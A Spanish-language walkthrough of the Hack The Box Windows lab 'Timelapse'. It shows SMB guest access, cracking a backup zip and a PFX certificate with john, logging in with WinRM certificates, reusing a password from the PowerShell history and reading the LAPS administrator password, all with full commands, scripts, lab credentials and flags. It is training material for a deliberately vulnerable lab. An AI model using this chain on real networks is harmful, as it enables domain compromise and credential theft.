En Timelapse descubrimos un backup de WinRM, este contenia un certificado de autenticación de WinRM, mismo que nos permitió obtener acceso a un primer usuario. El historial de PowerShell nos permitió acceder a la contraseña de un segundo usuario. Finalmente observamos que el usuario pertenecia a un grupo relacionado a LAPS, lo cual nos permitió obtener la contraseña de administrador.
Nombre |
Timelapse |
OS |
Windows |
Puntos |
20 |
Dificultad |
Facil |
IP |
10.10.11.152 |
Maker |
ctrlzero |
Matrix
|
{
"type":"radar",
"data":{
"labels":["Enumeration","Real-Life","CVE","Custom Explotation","CTF-Like"],
"datasets":[
{
"label":"User Rate", "data":[6, 5.4, 4.5, 5.5, 4.6],
"backgroundColor":"rgba(75, 162, 189,0.5)",
"borderColor":"#4ba2bd"
},
{
"label":"Maker Rate",
"data":[10, 10, 10, 0, 0],
"backgroundColor":"rgba(154, 204, 20,0.5)",
"borderColor":"#9acc14"
}
]
},
"options": {"scale": {"ticks": {"backdropColor":"rgba(0,0,0,0)"},
"angleLines":{"color":"rgba(255, 255, 255,0.6)"},
"gridLines":{"color":"rgba(255, 255, 255,0.6)"}
}
}
}
|
Recon
nmap
nmap
muestra multiples puertos abiertos: dns (53), kerberos (88), rpc (135), ldap (389), winrm (5986).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
|
# Nmap 7.92 scan initiated Tue Mar 29 19:32:52 2022 as: nmap -p53,88,135,139,389,445,593,636,3268,3269,5986,9389,49667,49674,49696,53230 -sV -sC -oN nmap_scan -Pn 10.10.11.152
Nmap scan report for 10.10.11.152 (10.10.11.152)
Host is up (0.071s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-30 07:32:57Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_ssl-date: 2022-03-30T07:34:26+00:00; +7h59m58s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49696/tcp open msrpc Microsoft Windows RPC
53230/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-30T07:33:47
|_ start_date: N/A
|_clock-skew: mean: 7h59m57s, deviation: 0s, median: 7h59m57s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 29 19:34:30 2022 -- 1 IP address (1 host up) scanned in 97.61 seconds
|
RPC/SMB/LDAP
Sesiones nulas no nos permitieron obtener informacion por smb, ldap y rpc.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
π ~/htb/timelapse ❯ rpcclient -U "" -N 10.10.11.152
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $> exit
π ~/htb/timelapse ❯
π ~/htb/timelapse ❯ crackmapexec smb 10.10.11.152 -u '' -p '' --shares
SMB 10.10.11.152 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.152 445 DC01 [-] timelapse.htb\: STATUS_ACCESS_DENIED
SMB 10.10.11.152 445 DC01 [-] Error enumerating shares: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
π ~/htb/timelapse ❯ crackmapexec ldap 10.10.11.152 -u '' -p ''
SMB 10.10.11.152 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.152 445 DC01 [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
[.. snip ..]
π ~/htb/timelapse ❯
|
SMB - Guest
Kerbrute
Utilizamos kerbrute
para enumerar los usuarios con un pequeño wordlist. Encontramos los usuarios: administrator
y guest
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
π ~/htb/timelapse ❯ ./kerbrute userenum --domain timelapse.htb --dc timelapse.htb usernames.txt -t 100
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/22/22 - Ronnie Flathers @ropnop
2022/04/22 20:12:12 > Using KDC(s):
2022/04/22 20:12:12 > timelapse.htb:88
2022/04/22 20:12:17 > [+] VALID USERNAME: administrator@timelapse.htb
2022/04/22 20:16:19 > [+] VALID USERNAME: guest@timelapse.htb
2022/04/22 20:22:11 > Done! Tested 86771 usernames (2 valid) in 599.200 seconds
π ~/htb/timelapse ❯
|
SMB
Utilizando guest
como usuario con crackmapexec, identificamos el recurso compartido Shares
donde observamos que el usuario tiene permisos de lectura.
1
2
3
4
5
6
7
8
9
10
11
12
13
|
π ~/htb/timelapse ❯ crackmapexec smb timelapse.htb -u guest -p '' --shares
SMB timelapse.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB timelapse.htb 445 DC01 [+] timelapse.htb\guest:
SMB timelapse.htb 445 DC01 [+] Enumerated shares
SMB timelapse.htb 445 DC01 Share Permissions Remark
SMB timelapse.htb 445 DC01 ----- ----------- ------
SMB timelapse.htb 445 DC01 ADMIN$ Remote Admin
SMB timelapse.htb 445 DC01 C$ Default share
SMB timelapse.htb 445 DC01 IPC$ READ Remote IPC
SMB timelapse.htb 445 DC01 NETLOGON Logon server share
SMB timelapse.htb 445 DC01 Shares READ
SMB timelapse.htb 445 DC01 SYSVOL Logon server share
π ~/htb/timelapse ❯
|
En el recurso Shares
encontramos dos carpetas: \Dev vemos un archivo zip, \HelpDesk muestra multiples documentos y un archivo de instalación de LAPS.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
π ~/htb/timelapse ❯ smbclient //timelapse.htb/Shares -u guest
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021
6367231 blocks of size 4096. 1625003 blocks available
smb: \> cd Dev
smb: \Dev\> ls
. D 0 Mon Oct 25 15:40:06 2021
.. D 0 Mon Oct 25 15:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021
6367231 blocks of size 4096. 1625003 blocks available
smb: \Dev\> cd ..\HelpDesk
smb: \HelpDesk\> ls
. D 0 Mon Oct 25 11:48:42 2021
.. D 0 Mon Oct 25 11:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 10:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 10:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 10:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 10:57:44 2021
6367231 blocks of size 4096. 1625003 blocks available
smb: \HelpDesk\>
|
User - Legacyy
Backup
El archivo zip está protegido por contraseña, utilizamos zip2john
para obtener el hash y con john la contraseña para decomprimir los archivos.
1
2
3
4
5
6
7
8
9
10
11
12
|
π ~/htb/timelapse/shares ❯ zip2john winrm_backup.zip > hash_zip
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
π ~/htb/timelaps/shares ❯ john --wordlist=$ROCK hash_zip
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-03-29 21:41) 2.380g/s 8270Kp/s 8270Kc/s 8270KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
π ~/htb/timelapse/shares ❯
|
Encontramos un certificado protegido en formato PKCS#12, utilizamos pfx2john.py
para obtener el hash y con john la contraseña.
1
2
3
4
5
6
7
8
9
10
11
12
13
|
π ~/htb/timelapse/shares ❯ /usr/share/john/pfx2john.py legacyy_dev_auth.pfx > hash_pfx
π ~/htb/timelapse/shares ❯ john --wordlist=$ROCK hash_pfx
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:00:46 DONE (2022-03-29 21:44) 0.02158g/s 69754p/s 69754c/s 69754C/s thuglife06..thsco04
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
π ~/htb/timelapse/shares ❯
|
Shell - WinRM SSL
El nombre del archivo zip nos indica un backup de WinRM por lo que el certificado podria ser utilizado para autenticarnos por winrm. Utilizamos openssl para generar un certificado y una clave.
1
2
3
4
5
6
7
8
|
# Extract the private key
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacy.key
# Extract the certificate
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacy.crt
# Decrypt the private key
openssl rsa -in legacy.key -out legacy-decrypted.key
|
Utilizando la libreria WinRM con el certificado y clave como lo indica la documentacion SSL, creamos un pequeño script para autenticarnos y ejecutar comandos.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
require 'winrm'
conn = WinRM::Connection.new(
endpoint: 'https://timelapse.htb:5986/wsman',
transport: :ssl,
:client_cert => 'legacy.crt',
:client_key => 'legacy-decrypted.key',
:key_pass => 'thuglegacy',
:no_ssl_peer_verification => true,
)
command=""
conn.shell(:powershell) do |shell|
until command == "exit\n" do
print "PS > "
command = gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
end
|
Tras ejecutar el script logramos obtener una shell como legacyy
y la flag user.txt
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
π ~/htb/timelapse/shares/cert ❯ ruby shell.rb
PS > whoami
timelapse\legacyy
PS > pwd
Path
----
C:\Users\legacyy\Documents
PS > cd ..\Desktop
PS > dir
Directory: C:\Users\legacyy\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/23/2022 12:12 AM 34 user.txt
PS > type user.txt
86914b213ba97b81f82c930a156f3d75
PS >
|
User - svc_deploy
Tras ejecutar WinPEAS encontramos que existe un archivo de historial de PowerShell.
1
2
3
4
5
6
7
8
9
|
ÉÍÍÍÍÍÍÍÍÍ͹ PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.17763.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 434B
|
Encontramos multiples comandos, se muestra Invoke-Command
utilizando las credenciales del usuario svc_deploy haciendo una conexión a WinRM por localhost al puerto 5986.
1
2
3
4
5
6
7
8
9
10
11
12
|
PS > type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
PS >
|
Utilizamos el mismo comando ejecutando whoami
.
1
2
3
4
|
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck;
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force;
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p);
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock { whoami }
|
Tras ejecutarlo vemos que tenemos acceso como svc_deploy con estas credenciales.
1
2
3
|
PS > $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck; $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force; $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p); invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock { whoami }
timelapse\svc_deploy
PS >
|
Shell
Modificamos el script en Ruby con las credenciales encontradas.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
π ~/htb/timelapse/shares/cert ❯ cat svc_shell.rb
require 'winrm'
conn = WinRM::Connection.new(
endpoint: 'https://timelapse.htb:5986/wsman',
user: 'svc_deploy',
password: 'E3R$Q62^12p7PLlC%KWaxuaV',
transport: :ssl,
#:client_cert => 'legacy.crt',
#:client_key => 'legacy-decrypted.key',
#:key_pass => 'thuglegacy',
:no_ssl_peer_verification => true,
)
command=""
conn.shell(:powershell) do |shell|
until command == "exit\n" do
print "PS > "
command = gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
end
|
Logramos obtener una shell con el usuario svc_deploy.
1
2
3
4
5
6
7
8
9
10
11
|
π ~/htb/timelapse/shares/cert ❯ ruby svc_shell.rb
PS > whoami
timelapse\svc_deploy
PS > pwd
Path
----
C:\Users\svc_deploy\Documents
PS >
|
Privesc
Enumeramos la información del usuario svc_deploy vemos que pertenece al grupo LAPS_Readers el cual podría estar relacionado al archivo de instalación de SMB.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
|
PS C:\> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
timelapse\svc_deploy S-1-5-21-671920749-559770252-3318990721-3103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers Group S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
whoami : ERROR: Unable to get user claims information.
At line:1 char:1
+ whoami /all
+ ~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (ERROR: Unable t...ms information.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
PS C:\>
|
LAPS
Tras investigar un poco, encontramos un post relacionado a LAPS donde se muestra un escenario en el que un usuario sin permisos de administracion pero con permisos de lectura en LAPS puede leer la contraseña de un usuario administrador local. Tras ejecutar el comando mostrado vemos la contraseña de la computadora DC01.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
PS > Get-ADComputer dc01 -Properties ms-mcs-AdmPwd, ms-mcs-AdmPwdExpirationTime, canonicalname
CanonicalName : timelapse.htb/Domain Controllers/DC01
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName : dc01.timelapse.htb
Enabled : True
ms-mcs-AdmPwd : 6i4pJlu)-6B1n(132tD+3t+5 <------
ms-mcs-AdmPwdExpirationTime : 132956035317974980
Name : DC01
ObjectClass : computer
ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName : DC01$
SID : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :
PS >
|
De igual forma utilizando crackmapexec con el modulo laps es posible obtener la contraseña.
1
2
3
4
5
6
|
π ~/htb/timelapse ❯ crackmapexec ldap timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' –kdcHost timelapse.htb -M laps
SMB timelapse.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP timelapse.htb 389 DC01 [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
LAPS timelapse.htb 389 DC01 [*] Getting LAPS Passwords
LAPS timelapse.htb 389 DC01 Computer: DC01$ Password: 6i4pJlu)-6B1n(132tD+3t+5
π ~/htb/timelapse ❯
|
Shell
Observamos que las credenciales nos permiten acceder a todos los recursos.
1
2
3
4
5
6
7
8
9
10
11
12
13
|
π ~/htb/timelapse ❯ crackmapexec smb timelapse.htb -u administrator -p '6i4pJlu)-6B1n(132tD+3t+5' --shares
SMB timelapse.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB timelapse.htb 445 DC01 [+] timelapse.htb\administrator:6i4pJlu)-6B1n(132tD+3t+5 (Pwn3d!)
SMB timelapse.htb 445 DC01 [+] Enumerated shares
SMB timelapse.htb 445 DC01 Share Permissions Remark
SMB timelapse.htb 445 DC01 ----- ----------- ------
SMB timelapse.htb 445 DC01 ADMIN$ READ,WRITE Remote Admin
SMB timelapse.htb 445 DC01 C$ READ,WRITE Default share
SMB timelapse.htb 445 DC01 IPC$ READ Remote IPC
SMB timelapse.htb 445 DC01 NETLOGON READ,WRITE Logon server share
SMB timelapse.htb 445 DC01 Shares READ,WRITE
SMB timelapse.htb 445 DC01 SYSVOL READ Logon server share
π ~/htb/timelapse ❯
|
Utilizamos nuevamente un script en ruby con las credenciales del usuario administrator, logrando obtener una shell y la flag root.txt
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
π ~/htb/timelapse/shares/cert ❯ ruby admin_shell.rb
PS > whoami
timelapse\administrator
PS > pwd
Path
----
C:\Users\Administrator\Documents
PS > dir ..\Desktop
PS > dir ..\..\
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
PS > cd ..\..\TRX\Desktop
PS > dir
Directory: C:\Users\TRX\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/23/2022 12:12 AM 34 root.txt
PS > type root.txt
3a2f63973573a40d5ae3185f8a110257
PS >
|